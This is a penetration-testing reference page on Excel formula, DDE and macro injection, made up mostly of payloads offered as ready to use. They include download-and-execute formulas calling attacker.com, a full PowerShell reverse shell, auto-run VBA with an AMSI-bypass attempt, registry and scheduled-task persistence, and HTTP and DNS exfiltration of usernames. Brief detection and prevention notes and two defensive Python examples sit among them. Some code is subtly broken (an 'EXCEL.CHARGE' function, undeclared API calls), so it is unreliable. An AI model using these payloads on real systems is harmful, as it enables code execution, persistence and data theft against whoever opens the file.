# Excel Injection

> Comprehensive collection of Excel injection techniques, payloads, and attack vectors for security testing and penetration testing.

## 📋 Overview

Excel injection encompasses various attack vectors that leverage Excel features to execute arbitrary code, exfiltrate data, or perform malicious actions when users open or interact with Excel files.

## 🎯 Summary

* [Basic Formula Injection](#basic-formula-injection)
* [Dynamic Data Exchange (DDE) Attacks](#dynamic-data-exchange-dde-attacks)
* [Excel Macro Injection](#excel-macro-injection)
* [Excel Power Query Injection](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-power-query-injection)
* [Excel External Link Injection](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-external-link-injection)
* [Excel Injection Examples - Step by Step](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-injection-examples)
* [Testing Lab Setup Guide](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup)
* [Payload Examples](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Payloads/README.md)
* [Tools and Utilities](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Tools/README.md)

## 🎯 Quick Start

**New to Excel Injection? Start here:**

1. [**Theory & Basics**](#overview) → Understand fundamental concepts
2. [**Step-by-Step Examples**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-injection-examples) → Practical hands-on learning
3. [**Testing Lab Setup**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) → Create safe practice environment
4. [**Payload Generator**](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Tools/excel-payload-generator.py) → Generate custom payloads

**Experienced User? Jump to:**

* [**Advanced Techniques**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-power-query-injection) → Power Query & M code attacks
* [**Payload Library**](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Payloads/basic-excel-injections.csv) → 200+ ready payloads
* [**Lab Configuration**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) → Professional testing setup

## 🚀 Basic Formula Injection

### Formula Triggers

Excel evaluates a cell as a formula when its content begins with one of these characters:

```excel
=   Equals
+   Plus
-   Minus
@   At sign (Excel 2016+)
```
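The defensive counterpart to the trigger list above, as an added example that is not part of the original page: an application that exports untrusted values to CSV can neutralise them before writing. The function names are hypothetical. The single-quote prefix and the extra tab and carriage-return triggers are assumptions taken from the OWASP CSV Injection guidance listed in the references.

```python
import csv
import io
import re

# Trigger characters listed above, plus tab and carriage return (assumption:
# taken from OWASP's CSV Injection guidance, not from this page).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# Signed plain numbers such as "-42" are data, not formulas.
PLAIN_NUMBER = re.compile(r"[+-]?\d+(\.\d+)?")


def neutralise_cell(value):
    """Return the value as text a spreadsheet will not evaluate as a formula."""
    text = "" if value is None else str(value)
    candidate = text.lstrip(" ")  # also catch values padded with leading spaces
    if not candidate.startswith(FORMULA_TRIGGERS):
        return text
    if PLAIN_NUMBER.fullmatch(candidate):
        return text
    # A leading single quote makes the spreadsheet treat the cell as text.
    return "'" + text


def export_rows(rows):
    """Write rows to CSV text with every field neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample rows; the second field of row two is a payload
    # quoted from this page.
    print(export_rows([
        ["Alice", "-42"],
        ["Mallory", "=cmd|'/C calc.exe'!A1"],
    ]))
```

The prefix changes the stored value, so consumers other than spreadsheets will see the leading quote; apply it at export time rather than on data at rest.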

### Basic Command Execution

#### Windows Command Execution

```excel
=cmd|'/C calc.exe'!A1
=cmd|'/C powershell -Command "Start-Process calc"'!A1
=HYPERLINK("cmd|'/C calc.exe'!A1","Click me")
```

#### PowerShell Download and Execute

```excel
=cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'!A1
=cmd|'/C powershell -W hidden -Command "&([scriptblock]::Create((New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\"))).Invoke()"'!A1
```

#### Reverse Shell

```excel
=cmd|'/C powershell -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.100\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'!A1
```

## 🔥 Dynamic Data Exchange (DDE) Attacks

### Basic DDE Payloads

```excel
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
=2+5+cmd|' /C calc'!A0
=cmd|' /C calc'!'A1'
```

### Advanced DDE Attacks

```excel
=cmd|'/C powershell -Command "IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.com/dde.ps1\")"'!A0
=cmd|'/C rundll32.exe url.dll,OpenURL calc.exe'!A0
=cmd|'/C mshta.exe http://attacker.com/payload.hta'!A0
```

### DDE Obfuscation

```excel
=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A
=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A
=         cmd|'/c calc.exe'!A
=SUBSTITUTE(SUBSTITUTE("=cmd|'/c calc'!A1","=",""),"'","")
```

## 📝 Excel Macro Injection

### VBA Macro Payloads

#### Auto-Execute on Open

```vba
Private Sub Workbook_Open()
    Shell "cmd.exe /c calc.exe", vbHide
End Sub

Private Sub Document_Open()
    CreateObject("WScript.Shell").Run "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
End Sub
```

#### Advanced Macro with AMSI Bypass

```vba
Private Sub Workbook_Open()
    On Error Resume Next

    ' AMSI Bypass
    Dim amsiPtr As LongPtr
    amsiPtr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer")

    If amsiPtr <> 0 Then
        Dim patch As String
        patch = "B8" & String(16, "00") & "C3"
        Call WriteProcessMemory(GetCurrentProcess(), amsiPtr, StrPtr(patch), Len(patch), 0)
    End If

    ' Execute payload
    Dim ps As Object
    Set ps = CreateObject("WScript.Shell")
    ps.Run "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1')", 0
End Sub
```

### XLM Macro (Excel 4.0)

```excel
=ALERT("This workbook contains macros",3)
=EXEC("cmd.exe /c calc.exe")
=CALL("Kernel32","WinExec","JJCC","calc.exe",0)
=HALT()
```

## 🛡️ Evasion Techniques

### Character Obfuscation

```excel
=CHARGE(67,68,109,100,124,39,47,67,32,99,97,108,99,39,33,65,49)
=CONCATENATE("c","m","d","|","'","/","C"," ","c","a","l","c","'","!","A","1")
=SUBSTITUTE(SUBSTITUTE("=cmd|'/C calc'!A1","=",""),"'","")
```

### Function-Based Obfuscation

```excel
=INDIRECT("cmd|'/C calc'!A1")
=EVALUATE("cmd|'/C calc'!A1")
=FORMULATEXT("=cmd|'/C calc'!A1")
```

### Encoding Techniques

```excel
=cmd|'/C echo Y21kIC9DIGFkZCB1c2VyIGhhY2tlciAvYWRkICJhZG1pbiI= | base64 /d | cmd'!A1
=cmd|'/C powershell -Command "$text = \"Y21kIC9DIGFscHJvZHVjdCBjYWxj\"; $bytes = [Convert]::FromBase64String($text); [System.Text.Encoding]::ASCII.GetString($bytes) | iex"'!A1
```

## 🌐 Network-Based Attacks

### HTTP Request Payloads

```excel
=cmd|'/C curl http://attacker.com/excel-injection?data=%USERNAME%'!A1
=cmd|'/C powershell -Command "Invoke-WebRequest -Uri http://attacker.com/collect -Method POST -Body @{data=$env:USERNAME}"'!A1
=WEBSERVICE("http://attacker.com/excel-injection?data="&A1)
```

### DNS Exfiltration

```excel
=cmd|'/C nslookup %USERNAME%.attacker.com'!A1
=cmd|'/C powershell -Command "nslookup \"$env:USERNAME.$env:COMPUTERNAME.attacker.com\""'!A1
```

## 📱 Platform-Specific Attacks

### Windows-Specific

```excel
=cmd|'/C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v \"Payload\" /t REG_SZ /d \"cmd.exe /c calc.exe\"'!A1
=cmd|'/C schtasks /create /tn \"ExcelPayload\" /tr \"calc.exe\" /sc onlogon'!A1
=cmd|'/C powershell -Command \"Register-ScheduledTask -TaskName ExcelPayload -Action (New-ScheduledTaskAction -Execute calc.exe) -Trigger (New-ScheduledTaskTrigger -AtLogon)\"'!A1
```

### macOS-Specific (Excel for Mac)

```excel
=APPLESCRIPT("do shell script \"osascript -e 'tell application \"System Events\" to keystroke \"calc\" using command down'")
=APPLESCRIPT("do shell script \"curl http://attacker.com/mac-payload.sh | bash\"")
```

## 🎨 Social Engineering Attacks

### Malicious Hyperlinks

```excel
=HYPERLINK("cmd|'/C calc.exe'!A1","Click here for important information")
=HYPERLINK("http://attacker.com/phishing.html","Login to your account")
=HYPERLINK("javascript:alert('XSS')","Click me")
```

### Deceptive Formulas

```excel
="Total: $1000 "&cmd|'/C calc.exe'!A1
="Invoice ID: INV-2024-"&cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\")'!A1
```

## 🔍 Detection and Prevention

### Detection Signs

* Unexpected formula execution
* DDE warnings from Excel
* Suspicious macro content
* Network connections from Excel processes
* Unusual child processes from Excel
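The "unusual child processes from Excel" sign can be checked against process-creation telemetry. The following is an added example, not code from the original page: it filters events shaped like Sysmon Event ID 1 records (`ParentImage`, `Image`, `CommandLine`) for `excel.exe` spawning the binaries that appear in this page's payloads. The sample events and the function name are constructed for illustration.

```python
import ntpath

# Child binaries that appear in this page's payloads; extend for your estate.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe",
    "nslookup.exe", "schtasks.exe", "reg.exe", "curl.exe",
}


def image_name(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path or "").lower()


def flag_excel_children(events):
    """Return the events where excel.exe directly spawned a listed binary."""
    hits = []
    for event in events:
        if image_name(event.get("ParentImage")) != "excel.exe":
            continue
        if image_name(event.get("Image")) in SUSPICIOUS_CHILDREN:
            hits.append(event)
    return hits


# Constructed sample events (hypothetical hosts, simplified fields).
EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
SAMPLE_EVENTS = [
    {"ParentImage": EXCEL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /C calc.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"ParentImage": EXCEL, "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 8192"},
    {"ParentImage": EXCEL.lower(),
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden"},
]

if __name__ == "__main__":
    for hit in flag_excel_children(SAMPLE_EVENTS):
        print(image_name(hit["Image"]), "<-", hit["CommandLine"])
```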

### Prevention Measures

1. **Enable Protected View** in Excel
2. **Disable Macros** by default
3. **Block DDE functionality** via Group Policy
4. **Use Application Control** to block Excel spawning suspicious processes
5. **Network Monitoring** for unusual Excel traffic
6. **File Sandboxing** before opening

## 📚 References

* [Microsoft Security Advisory - DDE](https://msrc.microsoft.com/advisory)
* [OWASP - CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection)
* [BlackHat - Excel Macro Attacks](https://www.blackhat.com/presentations)
* [SANS - Excel Security](https://www.sans.org/white-papers/)

## 🛠️ Related Tools

* [Excel Payload Generator](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Tools/excel-payload-generator.py) - Comprehensive payload generation tool
* [Basic Payload Examples](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Payloads/basic-excel-injections.csv) - Ready-to-use injection payloads
* [Step-by-Step Examples](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-injection-examples) - 8 complete practical scenarios
* [Testing Lab Setup](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) - Complete virtual lab configuration

***

*⚠️ This documentation is for educational purposes and authorized security testing only. Always obtain proper authorization before testing.*
